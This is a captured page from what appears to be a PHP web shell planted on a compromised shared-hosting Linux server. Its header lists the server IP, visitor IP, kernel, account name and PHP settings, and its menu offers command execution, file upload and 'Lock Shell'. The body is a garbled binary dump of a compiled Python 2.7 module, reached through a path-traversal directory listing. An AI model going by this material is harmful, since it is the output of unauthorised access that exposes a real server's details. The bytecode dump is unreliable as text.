Server IP : 217.21.91.109 / Your IP : 216.73.216.234 Web Server : LiteSpeed System : Linux in-mum-web830.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u903744608 ( 903744608) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /etc/fonts/../../../../../opt/../proc/../lib64/python2.7/hotshot/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
---|
� zfc@s�dZddlZddlZddddddd d gZy eZWn'ek rodefd��YZnXd �Zd�Z d�Z d�Zd�Zd�Z d�Zd�Zd�ZdS(s� Path operations common to more than one OS Do not use directly. The OS specific modules import the appropriate functions from this module themselves. i����Ntcommonprefixtexiststgetatimetgetctimetgetmtimetgetsizetisdirtisfilet_unicodecBseZRS((t__name__t __module__(((s#/usr/lib64/python2.7/genericpath.pyRscCs-ytj|�Wntjk r(tSXtS(sDTest whether a path exists. Returns False for broken symbolic links(toststatterrortFalsetTrue(tpath((s#/usr/lib64/python2.7/genericpath.pyRs cCs;ytj|�}Wntjk r*tSXtj|j�S(s%Test whether a path is a regular file(RRR RtS_ISREGtst_mode(Rtst((s#/usr/lib64/python2.7/genericpath.pyR"s cCs;ytj|�}Wntjk r*tSXtj|j�S(s<Return true if the pathname refers to an existing directory.(RRR RtS_ISDIRR(tsR((s#/usr/lib64/python2.7/genericpath.pyR.s cCstj|�jS(s1Return the size of a file, reported by os.stat().(RRtst_size(tfilename((s#/usr/lib64/python2.7/genericpath.pyR7scCstj|�jS(sCReturn the last modification time of a file, reported by os.stat().(RRtst_mtime(R((s#/usr/lib64/python2.7/genericpath.pyR<scCstj|�jS(s=Return the last access time of a file, reported by os.stat().(RRtst_atime(R((s#/usr/lib64/python2.7/genericpath.pyRAscCstj|�jS(sAReturn the metadata change time of a file, reported by os.stat().(RRtst_ctime(R((s#/usr/lib64/python2.7/genericpath.pyRFscCs[|s dSt|�}t|�}x2t|�D]$\}}|||kr/|| Sq/W|S(sGGiven a list of pathnames, returns the longest common leading componentt(tmintmaxt enumerate(tmts1ts2titc((s#/usr/lib64/python2.7/genericpath.pyRLscCs�|j|�}|r6|j|�}t||�}n|j|�}||kr�|d}x?||kr�|||kr�|| ||fS|d7}q^Wn|dfS(s�Split the extension from a pathname. Extension is everything from the last dot to the end, ignoring leading dots. Returns "(root, ext)"; ext may be empty.iR(trfindR(tptseptaltseptextseptsepIndextaltsepIndextdotIndext filenameIndex((s#/usr/lib64/python2.7/genericpath.pyt _splitext]s (t__doc__RRt__all__tunicodeRt NameErrortobjectRRRRRRRRR-(((s#/usr/lib64/python2.7/genericpath.pyt<module>s"